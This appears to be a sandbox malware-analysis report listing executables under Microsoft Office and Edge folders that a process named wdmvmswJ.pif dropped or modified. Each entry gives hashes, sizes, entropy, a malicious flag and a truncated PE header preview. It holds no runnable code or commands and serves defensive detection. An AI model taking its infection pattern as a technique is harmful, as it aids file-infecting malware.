                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.............................................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p...p...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1343488
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.236038349195191
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:jjuozQMGNUbTpXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:PfNsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:FC9BBB8F1989D9CB3BFECFF2117B1A62
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:70FDF6555379559CA0598C6E5D614443EEE71C1F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BA0AA0CBE2CB81014BEB31D051E6F7C51676E6537BAC0281F95AA98611B65745
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:20B444A95E5D7B6F058C5AA67026E5FAC51DDD90B8C688880DAA009B1E593F040721075C4C55929250CE9B67330E22918A437053C3577BACD865C328B2C71379
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.....................................o.... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1500160
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.5661984747109505
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:UbUO42y/EAsqjnhMgeiCl7G0nehbGZpbD:UZ8Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:202977845D043642CC3B3B5A74DC5B26
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:BA92DA5B4B19E18EBD3BF08FD083D1452CEE9326
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D431219E13EFB80217D3F5A97CDF7C336C24DBD269CAA4A9E6CC4DD9DA5BB820
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:97D229C0ABAD72D90003585C631F7BE39491A11CFB6B518CFC26D0F68CC02004ED570D924D34815CC28DE9861426819C65C0F0ECB64C817F532E1C9E6CC5A0C3
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@..........................0................... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...............d..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):52712960
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.961838907566781
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1572864:OLjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:SicZmsR3Lo/cnLe
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:BB7A5E8827F9DE88A895F21C308DAB41
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DC18BFCFBC95516790B9276D0BE34F9A7DC3D3DF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:FA5FC5693767A4FC24C7073C3E39FD7A6EEBE7B1439A9E1D7B70065DE344A563
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EAB7BA8A4EBA1F7EA49F3BA651105081DD4B0C6472F706BE3B9F5D2DC40F2698AAF7D2FD2C27BCAAA8FC8E8810969716A341E288F7EAE5D5987BE05CE4A31310
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$..... .$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1661440
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.624523443283969
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:a08DMeflpnIOvYUBsqjnhMgeiCl7G0nehbGZpbD:adDD9pnIOfDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:0F2737C0FCC6E07A61FD2EABD356E98C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0505E3B9E92EDF486D0AE66634A38E0B03CC3158
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:70AE5B41ED59306837CAD96E2C430068D6727638FC049F6F55B7708015F90A58
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:ABB46DB668D35EA9E76430EB613E620B236BAA5E23BE739C40D348D7DD9374C2381D1BD0CF64C7B4F8A552FC2C153A80DE591D30C60E889DAE2A5A182FE746A9
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@.......................................... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...`.......P..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4364800
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.748483048025042
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:wB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EcDmg27RnWGj:6HzorVmr2ZkRpdJYoliD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:F162FEC047663FED51F9FA4F6535FB17
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FED9A7D8717668C7BA14419E8FFA333802EA1C71
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4137BB598160D80E934C960382B77A31739BF51D33D6E656380DFE451A7A28B9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5CFD30FAFA191AE6DB8FCED42C6C2818243721B33299094A362BEAEAB04F0A4FC2C3584BBE787819621360E9BF84B5B58EE5BF7FDA7FA03698276CB837A38E56
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD......wC... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.133485545520552
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:q3w1uVdSEjbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:qEyTbsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:CFD6C2498D29EABB18D95658E071641A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:593DC05F360FF07CC10231D30D49698A8EE4C9B5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D8102BA90581A482BBA3B9CF17B4CC43C8A42300BC3B2A241EEE20B70076ABA6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:34017AE4D112D8E5E3E0E691469DBDA15F5769560F8F0E93610E063409CE647641F7076FF86D4931560DB0C171A265D36B00429D3EA2A94A8EECA27E3FD29C61
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................`......O..... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2354176
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.050007649971273
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:ahDdVrQ95RW0YEHyWQXE/09Val0GMDmg27RnWGj:ahHYW+HyWKTD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:BE02F61FAC56C7D6563B746AF0B6AB07
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F8C659579A2007DAAC92ED51B25DCB42E456E9FD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F58DEE5B5D1F53D11EFFB9DDF45D0DE6A9913C3AD0617A5AB7A2A4E7D9115B25
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C439FADF905036FAB4D54A7DAD1BD2C5440739A10F0BC062AACFE62EBAACD7314CD66BCFA51A7D1C6D1E3167456B8908ECCA6416DF901319527B7BDE151AD02C
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.....M!$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1825280
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.158494396557871
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:B70E0ZCQZMiU6Rrt9RoctGfmddwsqjnhMgeiCl7G0nehbGZpbD:F0EzQSyRPRoc1YDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:67103446BCBE19BCCEC4C9A0BA5E78B6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D2E78C3781919464061860E4AFFFB9BCB1B1ABD3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BBF65C780F91CF2233B91B64A55DD35A630DE7D9B2BB0841B03959916781265D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:801A52858FC717264BD8E5152C82BBCAA70EDCA3E6BAD21EA0B1EC915725CE3DC79E6FFD6732EC84599C42798F9D9B3581C725276E4290B0FB17D1709A981BDD
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0......C..... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.14548547149981
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:JiD2VmA1YXwHwlklb8boUuWPg2gvsqjnhMgeiCl7G0nehbGZpbD:ID2VmAyiwIb8boQ8Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:7E27CE285E56A3F2D8391082526D2962
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E42F8238E13A47973C9B1E1BCF835C9FA479C5C4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6A046EDAE5F0583263587F5AD9F73E6E8C8DE6E9C3A07751940A05800B50C197
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:3B77720D74F75AB441870B2AAA1847537B3CFF4F24E84DEE5606C515A947FF39FEEC9B3D8FC4B6BB364537E7ABEE74A46BDAB10199486938116A8A039DB4B218
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p.......5.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2853376
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.950742092750016
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:EfD3zO9ZhBGloizM3HRNr00EDmg27RnWGj:eDaalxzM00ED527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:A7296EB08758E5F96335C58645B2D754
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E4693068D3F03907E81433D1C51AEC309BCCA84A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:2B1DE7E3047319F48840CA88C41DCFC3AC4BBF59DF6D12495E8D2A0C58AF0FA0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:215C10C83688230CD480FA8B8A5259694213FF1E8406A638C4CE362736E834A252F518E7E4EE3DDFD7DEC19C3933EE7390F12D713A150898029A9B1BD61BE4B3
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.......+... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4320256
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.824618096052798
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:KTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPh3Dmg27RnN:FI72LvkrDpbxJRoIMsD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:B8E2363A7CDA7E2452E6F10B24FBFBCF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CF19A6AB960A28994B7B829258416EB57C43663A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0E0E0D6472F814D7028C56BDDE54045F325F1B71160868F578E282DBA88D0CEC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:36BD65F560B12697AC830C9E0049754BE7D3514C8560473D5B2196A02226112FEA5DDB515732713A9BF1A4D1A3BC323739BC1064632231CFB8BE3E0500621EF4
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2062336
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.09724479787688
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:RW9Jml9mmijviMnF+ZxmQWcbLw8VgsqjnhMgeiCl7G0nehbGZpbD:RWnm5iOMkjmQWkVcDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:2C92DF9E3081B78857565509221402D3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:762F43FF3974E958A11792DF044E395B1E146764
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8CCA7B84527F602ED4C5905135B835D254BF0FA374639BDC4FD469E0AA0FA55C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8E5388D64A87D7AD1A0C60C45D10BEB8164468AD637DEA93CE092485EFF89B44044CB53FD6E0EE7206E3064D2B2DC24270EA9592269FE9C6C91F8A4A88E3CF02
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .......... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.166369270361556
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:OwNHwoYhua6MtjRO4qbBJTY6mY1uIgWsqjnhMgeiCl7G0nehbGZpbD:OwNPdQO7BJTfmEtDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:5E825D4944EA5D984F16E53442A8E1EA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:81EA0592A798D33CBFAB0DAB006141520B66812C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CDFC801A1693F51013E556AE53C9048BB8EC54922C23C53E4500647C7699A45C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5A7F475153DE3E28F0484A4F50255279B11317A01CE5BC358D19932A5F9722911D68AF949731B0136F0A2B00F31EB0D138525F987D6A998F0D09CF9E489EFE19
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
